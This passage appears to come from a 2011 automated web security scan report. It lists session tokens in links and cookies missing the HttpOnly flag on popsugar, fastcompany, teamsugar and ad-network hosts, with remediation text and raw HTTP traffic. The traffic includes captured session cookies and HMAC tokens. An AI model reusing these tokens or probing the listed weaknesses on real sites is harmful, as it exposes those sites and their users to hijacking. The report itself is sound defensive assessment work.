<script type="text/javascript">
parent.postMessage("cb=f33dd7c2b4&origin=http\u00253A\u00252F\u00252Fwww.popsugar.com\u00252Ff2363acf9c&relation=parent&transport=postmessage&frame=f155d9a90c", "http:\
...[SNIP]...

4.6. http://www.fastcompany.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<!-- ContextWeb Start -->
<img src="http://bh.contextweb.com/bh/set.aspx?action=replace&advid=996&token=FACO1" width="1" height="1" border="0">
<!-- ContextWeb End -->
...[SNIP]...

5. Cookie without HttpOnly flag set
There are 51 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://teamsugar.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://teamsugar.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: teamsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=jj74rf9b5tana4c9qnqn6bimm6; expires=Wed, 05-Oct-2011 16:21:13 GMT; path=/
Set-Cookie: fg_locale=0; expires=Tue, 13-Sep-2011 12:47:53 GMT; path=/
Set-Cookie: client_locale=US; expires=Tue, 13-Sep-2011 12:47:53 GMT; path=/
Set-Cookie: sugarTestGroup=test; expires=Wed, 12-Oct-2011 12:47:53 GMT; path=/
Set-Cookie: ss1=0%7C1317831673%7CVtj50HZwVAf6XzfIzt45pAblVAlc658GleP1Nc35FHkxaznENVLWjwa6r%2F7%2FQyRFoDzvuZz8AHFrPwF2UlWsOSIIMrujdWcpuo8VFkywg9FaGJmF0KJRXqCWs5NNKfWFiSyueATPQRfbR%2B1oC0dkUnnxhQoHq43iqkB01kLggEksGLjY551W6XFy28G0iib7WHLy2wxKaiGtC1Pj3NDByA%3D%3D%7Ca8777ef288ebc1c6896acd503ed0e87922f8d289; expires=Wed, 05-Oct-2011 16:21:13 GMT; path=/; httponly
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Location: http://www.popsugar.com/community/welcome
Connection: close
Date: Mon, 12 Sep 2011 12:47:53 GMT
Server: lighttpd/1.4.26
Content-Length: 0


5.2. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=117090495&th=37103964303&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fc14.zedo.com%2FOzoDB%2Fcutils%2FR53_7_7%2Fjsc%2F1545%2Fzpu.html%3Fn%3D1545%3Bf%3D1%3Bz%3D2-110&f=2&p=9679837&a=1&rnd=9678783 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 09-Sep-2021 12:49:41 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 435
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg1213154547 = new Image();\r\n tfimg1213154547.src = "http://image2.pubmatic.com/AdServer/Pug?vcode=0";\r\n})();\r\n<\/sc
...[SNIP]...

5.3. http://a.visualrevenue.com/vr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.visualrevenue.com
Path:   /vr.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vr.js HTTP/1.1
Host: a.visualrevenue.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=172800
Cache-control: no-cache="set-cookie"
Content-Type: application/x-javascript
Date: Mon, 12 Sep 2011 12:47:51 GMT
Expires: Wed, 14 Sep 2011 12:47:51 GMT
Last-Modified: Tue, 01 Mar 2011 15:37:51 GMT
Server: nginx/1.0.5
Set-Cookie: AWSELB=0BEDD35ED8E6CA32BF18800A787004E3CF91BCBE3BFFB80FABF921A28E20105DFD0A7192507C14F040EBFEBE46C99980BBB5B288638CA88B7C61B7C4DEF91CE45E362C70;PATH=/;MAX-AGE=1800
Content-Length: 1105
Connection: keep-alive

(function(){function j(h){var b;a:{b=document.cookie.split(";");for(var c=0;c<b.length;c++){for(var a=b[c];a.charAt(0)==" ";)a=a.substring(1,a.length);if(a.indexOf("__vrf=")==0){b=a.substring(6,a.leng
...[SNIP]...

5.4. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; 
bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#
=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0201.rm.sp2
Set-Cookie: ih="b!!!!#!3e]N!!!!#=4X%/"; path=/; expires=Wed, 11-Sep-2013 12:48:37 GMT
Set-Cookie: vuday1=Ve/>3!4j#()xxac; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Set-Cookie: uid=uid=88b682c8-dd3d-11e0-8111-78e7d162bf12&_hmacv=1&_salt=2987826240&_keyid=k1&_hmac=d6fc6e23e1a639a39e50969336a0089f0e9aba40; path=/; expires=Wed, 12-Oct-2011 12:48:37 GMT
Set-Cookie: liday1=:Op`R$4^M4!4j#(@7q_<; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:37 GMT
Pragma: no-cache
Content-Length: 712
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10293202
...[SNIP]...

5.5. http://ad.yieldmanager.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?Z=0x0&anmember=541&anprice=&y=29&s=1620509&_salt=1964679122&B=10&r=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; 
bh="b!!!#d!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%
=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:30 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0229.rm.sp2
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:30 GMT
Pragma: no-cache
Content-Length: 846
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

var l = (screen.width - 300) / 2;
var t = (screen.height - 600) / 2;
var pop = window.open('http://adserving.cpxinteractive.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAAAEAAAAAAAAAAAAA
...[SNIP]...

5.6. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1079030&id=1079199&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
